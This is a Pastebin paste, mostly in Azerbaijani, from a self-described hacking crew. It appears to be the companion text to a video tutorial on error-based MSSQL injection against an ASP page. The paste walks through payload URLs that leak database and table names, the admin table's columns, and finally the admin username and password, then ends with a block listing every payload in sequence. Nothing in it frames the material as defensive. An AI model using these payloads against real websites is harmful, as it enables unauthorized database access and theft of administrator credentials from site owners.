Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Video :
- http://youtu.be/SvXgG0Aph1k
- Source:
- [code]#################################################################
- # IN THE NAME OF ALLAH
- # Date : 2012-04-09
- # Subject : MsSQL Injection
- # Author : Avatar [Fearless]
- # Software : Anti-armeniaa.ORG // Pirates-Crew.ORG // Mexfi.ORG // Pwn.Me :D
- # Team'Z : AA Team // PC Team // MF Team // The Fear // Pwn Team :D // UG Team
- # Greet`Z To : All The Member'Z of The Team'Z
- # Respect To : All My Bro'Z
- # About : CGM [<3E>] LD :D
- # Tested On : Windows 7 Ultimate x86[Demo]
- #################################################################
- Let'Z Start :
- Salamlar... Bu Gun Sizlere MsSQL Injection Dersliyi Sunuram... QEYD Edimki ZamaN paylashmishdi mende video-lu cekdim... 1 -de 1 shey qeyd edim OFF-TOpa
- gore uzrlu hesab edin helede windows aktiv deyil Windows Loader ile duzelt-meye calishdim sondurub yandirdim alinmadi... Her Neyse indi ishimize qayidaq
- new 1 adli belgede 0-dan sona yazilib baxaq Sozun duzu yadimda qalmir deye istifade edirem :D aha ilk olaraq burdan bashlayaq
- # Target Site : http://site.com/index.asp?ID=5
- # Open[aciq:D loru dilde] : http://site.com/index.asp?ID=5'
- indi bashlayaq table-lere baxmaga yada DB adi desekde olar :D DB adina baxmaga
- # DB Name : http://site.com/index.asp?ID=5 having 1=1-- ; Polly
- :D ve indi tableler
- # http://site.com/index.asp?ID=5 or 1=convert(int,(select top 1 table_name from information_schema.tables))--
- demeli burda table_name from information_schema.tables-- yeqin tanidiniz tutaqki qarshimiza Info cixdi bize ise bu lazim deyil o birisine baxaq
- # http://site.com/index.asp?ID=5 or 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in("info")))--
- ve qarshimiza admin cixdi
- # Table Name : admin
- # http://site.com/index.asp?ID=5 Select * from admin having 1=1--
- # Qarshimiza cixan Column adi : username
- # http://site.com/index.asp?ID=5 select * from admin group by admin.username having 1=1--
- burda admin.username = table.column
- 1 sheyide qeyd edimki bu : http://site.com/index.asp?ID=5 select * from admin group by admin.username having 1=1-- url-e daxil olanda bashqa 1 column
- gelir
- # http://site.com/index.asp?ID=5 select * from admin group by admin.username,admin.password having 1=1--
- bu zamanda dogrulugun istablayiriq ve o zaman admin is invalid yazir... yada buna benzer indi username + pass cekek
- # http://site.com/index.asp?ID=5 or 1 = (select top username from admin)--
- bu zaman username gelir
- # http://site.com/index.asp?ID=5 or 1 = (select top password from admin)--
- bu zamanda pass gelir qeyd bu cur pass/uname/dbname/tablename/columnname kimi yazilar ortada "" isarelerinin icinde gelir o zaman anlaya bilersiniz
- ve birazda mentiq... Bu Gunluk bu qeder... Video by . Avatar [Fearless][/code]
- 0-dan Sona :
- [code]http://site.com/index.asp?ID=5
- http://site.com/index.asp?ID=5'
- http://site.com/index.asp?ID=5 having 1=1--
- http://site.com/index.asp?ID=5 or 1=convert(int,(select top 1 table_name from information_schema.tables))--
- http://site.com/index.asp?ID=5 or 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in("Info")))--
- http://site.com/index.asp?ID=5 Select * from admin having 1=1--
- http://site.com/index.asp?ID=5 Select * from Admin group by admin.username having 1=1--
- http://site.com/index.asp?ID=5 Select * from table group by table.password,table.password having 1=1--
- http://site.com/index.asp?ID=5 or 1 = (select top 1 username from admin)--
- http://site.com/index.asp?ID=5 or 1 = (select top 1 password from table)--
- [/code]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement